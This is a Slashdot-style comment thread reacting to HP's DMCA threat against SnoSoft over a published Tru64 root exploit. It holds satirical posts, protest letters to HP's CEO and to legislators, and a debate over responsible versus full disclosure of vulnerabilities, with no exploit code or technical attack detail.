We thank you for having purchased our products in the past, but now that we have finalized our merger and cashed our options, we have lost our minds and come to the boggling conclusion that we don't want your money anymore. Please do not buy our products because honestly you can't trust us to inform you when there is a defect with our product. This includes any servers, and handhelds our merger partner might peddle, printers, or whatever the hell it is these people do. As a sign of our gratitude for your service, we will be providing each future customer with a free Berber mousepad under which you can sweep any problems you discover. I you believe the problem doesn't exist, and we believe the problem doesn't exist, then we can work together to warp reality and drive cusomers away like poor starving slobs on the street corner to a free luncheon. Personally, I don't recommend you use these things in anything that might risk a human life or attempt to improve society in any way. Heck, I wouldn't run my porn servers on this crap. Well, gotta run, muy coke dealer is here. And don't forget to F off!
P.S. - Don't unravel the mousepad to see how it's made or we'll sue your ass into orbit under the DCMA.
In case anyone wants it... (Score:2, Informative)
Great - Let this be our poster child (Score:2)
Subtle attack on the DMCA? (Score:3, Interesting)
Perhaps HP - having stopped Bruce Perens from protesting against the DMCA via civil disobedience - is attacking it via a reductio ad absurdum method. i.e. Showing exactly how it violates the principles of Free Speech. It's officially illegal to state that the Emperor has no clothes.
Dear Ms. Fiorina (Score:5, Interesting)
I am quite disappointed with HP's recent conduct with two issues related to the DMCA. I am in a senior enough position as a UNIX administrator that I have significant impact in how a multi-million dollar IT budget is spent. HP's invocation of the DMCA reduces my trust in HP as a vendor of secure and reliable technology. Therefore I am less inclined now than I ever have been in the past to purchase HP products.
The first issue is HP's request that Bruce Parens not present his findings on DVD copyright controls. If he is acting on his own behalf, and includes a disclaimer that this is a separate issue from what he does under the employment of HP, he should be allowed to go forth. If he is presenting HP intellectual property, HP has the right and responsibility to protect itself. This, however, does not seem to be the case.
The more disturbing issue is with regards to the handling of SnoSoft's publication of root exploits to the Tru64 operating system. As a UNIX administrator, I am responsible for researching technologies that I will put into production. Many times, these products are used to protect the intellectual property, stability, or other things that are of great importance to my employer's success and my career. If security researchers cannot force many of the bugs out in the open before I evaluate products, I have much more work on my hands. Furthermore, if I find a bug that I know can be used to compromise my system, without the ability to publicly discuss and disclose the bug, I may be unable to get a fix from the vendor or a home-grown workaround. If I am at the complete mercy of my vendors' good will, I fear that I will have a system that lacks stability and security.
Please reconsider your decision to use the Digital Millenium Copyright Act to stifle free speech. Once you come to the realization that the DMCA is not a law that is useful for HP, please put your lobbying efforts into repealing it and push for funding to enforce pre-DMCA laws that already provide more than adequate protections on copyright and other intellectual property issues.
I do not speak for my employer. Please remember, however, that my employer trusts me to make decisions that are in the employer's best interest. Your actions suggest that the purchase of HP products is in the best interest of no employer that I would work for.
Leave it to crackers (Score:5, Insightful)
Let the crackers have it.
Honorable Bruce Perens (Score:4, Informative)
, and in his Bio [perens.com] you can find:
" Hewlett-Packard Corporation - 2000 to Present
Senior strategist, Linux and Open Source. I am the first Open Source evangelist to gain a role in top management of a multi-Billion-dollar corporation. On the org chart there are only three people between me and the CEO - a general manager, a vice president, and a president. Among my assignments is to challenge HP management."
So he's in position to speak up in this case.
Note: I don't know if it's redundent but I'm sure some people would like to know. I don't ask for any mod point.
What will it end up to? (Score:3, Insightful)
Only the Government can investigate crimes.
Only the Government can test, examine, uncover defectives in consummer products
Only the Government can perform reverse engineering on anything
Only the Government is allowed to use top-grade encryption
The scope of Free Speech is defined by senators, and it happens that no constitutional right are being intruded.
That's to say, US would become a country where citizens, by laws, SHOULD trust the Government and any questions on the already established laws and regulations are prohibited.
What's wrong with the picture? I don't know, but I've read a novel book about a country whose government has absolute power over their citizens and no citizen is allowed to question the decision of the government. This government does not use any military power or violence to control their citizens, but by laws.
IIRC at the end of this story all the citizens end up living in an array of big tubes of liquid, and the rest of the rebels are either jailed(brains were sperated from their body) or terminated(becomes food for others). It's like Matrix, but this time some humans control everything.
Won't use HP in my shop (Score:3, Insightful)
Don't say it...don't say it...I'm warning you...
Use Linux.
Damn, I said it.
Why the fuck don't people want exploits fully disclosed? Sure, I don't have a problem with waiting a week or so to give a team/vendor (yes, even Microsoft) a chance to roll out a patch before making it public. It's a courtesy, not a necessity.
<rant />
Clearly some sort of political action is required. I suggest:
1. The DMCA needs to be repealed or ruled unconstitutional. Hopefully the ACLU or the EFF will take a case that'll get us there. Or some rich philanthropist geek could 'violate' it by exercising their constitutional rights. But the best ploy is for every one of *us* to contact (visit,snailmail,fax,call,email) 'our' reps in the House [house.gov] and Senate [senate.gov], rationally outline our objections, and protest like hell if they don't. Civil disobedience, etc.
2. Abolish corporate personhood (same methods).
3. Abolish the lobby industry.
4. Abolish campaign finance. Make it publicly funded, free TV-radio spots (public airwaves) equally distributed among ballot-qualified candidates.
We've let corporations have far too much swing. I'm all for making a buck, but Jesus F***ing Christ...
My letter to my Representative and Senators (Score:5, Insightful)
Today I read an article on news.com (http://news.com.com/2100-1023-947325.html) that Hewlett-Packard has intended to use the Digital Millennium Copyright Act (DMCA) to punish a company that has released information about a security vulnerability in an HP product. For quite some time I have been telling you that the DMCA is a bad law that needs to be repealed, and this is just more evidence to that effect. HP has known about this vulnerability for a year, but has chosen to do nothing to fix it.
HP's action could set a precedent that would stifle technology research. Companies would be free to release broken technologies that would eventually be used in high-security environments. Anyone who attempted to test the strengths of these products would be branded a criminal.
HP's customers and the American public deserve to know about security issues in HP's products. Withholding such information is just like the accounting scandals that have been rampant in recent times. Insecure technology is a weapon that hackers and terrorists can use against us. So when an American company decides to hide behind an American law rather than fix it products, our politicians need to re-examine that law.
I urge you to sponsor legislation that will repeal the DMCA. Americans deserve better. Please write back to me and let me know that you support my fair use rights in a digital world, and that you'll be working to repeal the DMCA.
HP is wrong; but hacker was irresponsible (Score:3, Insightful)
I think HP is wrong with its DMCA style threats, because they are not appropriate. However, I can sympathise with HP and understand why they may have "lashed out". I think the hacker in question was wrong to irresponsibly post the exploit for script kiddies to start playing with fire. For all the debate about various sorts of disclosure processes, it's quite clear that this approach potentially has a high impact upon any deployed systems and gives no time for either the vendors or the administrators to take action. This is just not a responsible real-world approach to dealing with security issues.
Re:HP is wrong; but hacker was irresponsible (Score:3, Insightful)
The person that made the information public knew that HP has had the information SEVERAL MONTHS before making the exploit public.
Its true that it may have been better to contact CERT first (note: HP already knew); post to bugtraq, but DESCRIBE the issue and not post the exploit... THEN once the PUBLIC description is made {and still no response from HP} [I say maybe give HP 14 working days] only then post the exploit as as done..
Re:Which Part of the DMCA? (Score:4, Funny)
Re:lets hope they do... (Score:2)
Take it to court and maybe lose, even if any sane reading of the Bill of Rights suggests otherwise.
Unfortunately, the courts are full of judges in their 60s with superstitious beliefs about computers and terror of hackers. The government lawyers will smear these guys up one side and down the other, exploiting every error they made, like calling their exploit "warez", a term commonly used for "stolen" code.
Quoting Gus from TrippingTheRift... (Score:2)
Re:let me see if I get this right (Score:3, Interesting)
This is a bad thing for HP. The thing is, hackers love to share their code with the world. And there are two ways to exploit that obsessive desire, either through good (white hat) mechanisms or through bad (cracker) mechanisms. If HP prevents hackers from researching exploits in a legitimate fashion, it won't stop the hackers -- they'll just only leak their hacks onto Eastern European warez websites outside of the reach of US law. HP won't be aware of anything until it's too late and millions of dollars of damage have already been done by malicious parties. It's like that old saw about gun ownership: When hacking software is a crime then only criminals will hack your software.
Re:Don't blame HP (Score:3, Insightful)
Yep. Murderers don't kill people; guns do! Don't send the murderers to jail; go after the gun manufacturers.
The USC made a stupid law; just because a stupid law exists it does not mean that it should be used to quash legitimate research. If Carly had half a brain, she would fire the idiot VP and apologize to Snosoft. But don't count on it happening anytime soon.
Re:I don't see the problem (Score:3, Insightful)
So free speech is good for academics, but not for random hacker?
What difference does it make who finds and reports a bug? The cool thing about the Internet is that you don't have to be a professor at MIT to publish security exploits. The publications speaks for itself.
And if I'm running affected software, I don't care who reports the problem - as long as I find out and get a fix.
Would you still feel the same if your bank kept your accounts on an Tru64 HP machines?